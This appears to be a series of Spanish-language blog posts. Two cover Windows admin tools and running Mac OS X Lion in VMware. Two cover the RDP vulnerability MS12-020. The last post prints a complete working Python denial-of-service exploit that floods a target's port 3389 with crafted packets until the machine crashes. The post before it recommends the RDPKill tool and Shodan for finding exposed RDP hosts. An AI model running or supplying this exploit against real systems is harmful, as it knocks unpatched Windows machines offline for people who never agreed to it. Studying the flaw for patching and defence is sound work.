Adaptando Windows para trabajar
No sabía muy bien que nombre ponerle a esta entrada ya que trata un poco de algo personal que me encuentro a la hora de trabajar con sistemas Microsoft Windows. Si te dedicas ha hacer algo de análisis de logs por ejemplo y quieres parsear ficheros es muy rápido hacerlo con grep, awk, cut etc.. Este tipo de herramientas vienen ya en sistemas GNU-Linux y *nix.
Para hacerlo desde el CMD de Windows, podemos por ejemplo utilizar el paquete Unix Utils este paqute lo copiamos en C:\Windows\System32, así que podemos hacer la llamada desde el cmd de Windows, ya tenemos algo muy potente que usamos en GNU-Linux adaptado a Windows.
También tenemos las utilidades de Nirsoft y las de Sysinternals, estas utilidades nos brindan una administración para casi cualquier cosa, además de utilidades aparte. Para mantener estas utilidades actualizadas al día, podemos usar por ejemplo Windows System Control Center, este software nos bajará ya demás nos actualizará las versiones que tengamos bajadas, de manera que siempre tendremos las herramientas actualizadas.
Si nuestro sistema es 64 bits, nos bajará las utilidades de 64 bits por lo que podremos incluso trabajar con la versión adecuada a nuestro sistema.
Otras de las herramientas que también uso mucho es sincronizar herramientas por SVN, como cliente para Windows estoy enamorado de TortoiseSVN, lo uso para sincronizar herramientas alojadas en Code Google por ejemplo 
Si quiero seguridad en mis datos puedo usar por ejemplo Bitlocker para Windows, eso me proporciona difrado en partición o en discos duros externos, como USB.
Para ejecutar archivos .pl de perl y .py de python, además de poder usarlo desde la consola de Windows uso Active Perl y Active Python, muy útil, la verdad.
Estos son algunas de las utilidades que utilizo cuando me instalo un sistema Windows.
MAC OS X Lion en VMWare 8
Hola!
Muy buenas a todos/as!
En el pequeño laboratorio que me estoy montando quería también incluir a MAC OS X Lion para poder hacer las auditorías, temas de malware etc…
Hay bastantes tutoriales de como añadir MAC OS X en VMWare 8, pero todo son problemas…
Así que expondré los pasos seguidos para poder tener la última versión de MAC OS X Lion y además que se pueda actualizar a la última versión, totalmente funcional.
Como requisitos:
- Última versión de VMWare
- Unlocker para VMWare
- VMWare tools para MAC
- VMDK para hacer la instalación, lo encontraremos por Google
- Sonido para el Lion
Los pasos a seguir es que, con el Unlocker aplicaremos un parche a VMWare para poder instalar y configurar MAC OS X Lion en VMWare 8.
Aplicamos el parche
Después de aplicar el parche, creamos la máquina virtual y en el momento de elegir el disco, escogemos el VMDK que nos hemos descargado préviamente.
Una vez cargado el VMDK, solo tendremos que iniciar la máquina virtual y instalar Lion. Una vez instalado, instalamos la VMWare tools descargadas antes.
Con las VMWare tools conseguiremos mejor resolución de pantalla, además de las carpetas compartidas con la máquina host.
Por último añadiremos los drivers de audio descargados en la parte de requisitos, lo instalaremos y actualizaremos el sistema.
Como resultado tendremos la última versión de Lion funcionando perfectamente!
Saludos cordiales
Mas formas de explotar la vulnerabilidad de escritorio remoto MS12-020
Hola!
Muy buenas a todos/as!
Hace unos días estuve hablando de la vulnerabilidad de escritorio remoto.
En la entrada exponía un script en Python para causar la denegación de servicio.
Ahora Mark dePalma ha sacado una herramienta que se llama RDPKill que explota la vulnerabilidad de Escritorio Remoto.
Hay que elegir el target y el puerto remoto y dale a Kill sencillo no? 
Podemos ver el uso…
La herramienta acaba causando un BSOD en el equipo remoto.
Por otro lado tenemos otra página web. que se llama RDPCheck!
Esta web coge nuestra IP Pública y metiendo el correo comprueba si nuestro RDP es vulnerable o no, podemos acceder aquí
Nos envía un reporte a nuestro correo
Y no olvidéis que, mediante Shodan, se pueden encontrar hosts que usen RDP 
Hasta aquí el artículo de hoy!
Saludos
Exploit para la vulnerabilidad en RDP de Microsoft (MS12-020)
Hola!
Muy buenas a todos/as!
Hace unos días salió la noticia de un fallo en el RDP de Microsoft.
Este fallo, es explotable, Microsoft ya publicó en marzo el boletín MS12-020 que soluciona los errores en RDP que habían sido puestos en su conocimiento a través de fuentes privadas.
Ya hay varios Pastebin con el código explotable para la vulnerabiliad, podemos ver el resumen de la vulnerabilidad aquí.
De los múltiples exploits que me he encontrado he hecho la prueba con uno de ellos.
Lo he probado contra una máquina Windows XP SP3
El código del exploit:
# ms12-020 smaller
# I reduced the needed payload to DOS, the crashed is caused by buf2
# bp RDPWD!NM_Disconnect // crash is after this
#
# freenode #ms12-020import socket
import sys
import time#init
buf0 = “030000130ee000000000000100080000000000″.decode(‘hex’)
#MCS: Connection-initial
buf1 = “030001d602f0807f658201940401010401010101ff30190204000000000204000000020204000000000204000000010204000000000204000000010202ffff020400000002301902040000000102040000000102040000000102040000000102040000000002040000000102020420020400000002301c0202ffff0202fc170202ffff0204000000010204000000000204000000010202ffff02040000000204820133000500147c0001812a000800100001c00044756361811c01c0d800040008008002e00101ca03aa09040000ce0e000048004f005300540000000000000000000000000000000000000000000000000004000000000000000c0000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000001ca010000000000100007000100300030003000300030002d003000300030002d0030003000300030003000300030002d003000300030003000300000000000000000000000000000000000000000000000000004c00c000d0000000000000002c00c001b0000000000000003c02c0003000000726470647200000000008080636c6970726472000000a0c0726470736e640000000000c0″.decode(‘hex’)
#payload
buf2 = “0300000802f08028″.decode(‘hex’)package = buf0+buf1+buf2
HOST = sys.argv[1]
PORT = 3389
for i in range(10000):
print i
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.settimeout(3)
s.connect((HOST,PORT))
try:
s.send(package)
rec = s.recv(1024)
except:
pass
s.close()
Al ejecutarlo la máquina Windows remota se reinicia.
En el enlace anterior sobre la información de la vulnerabilidad podréis encontrar los parches correspondientes.
Saludos!
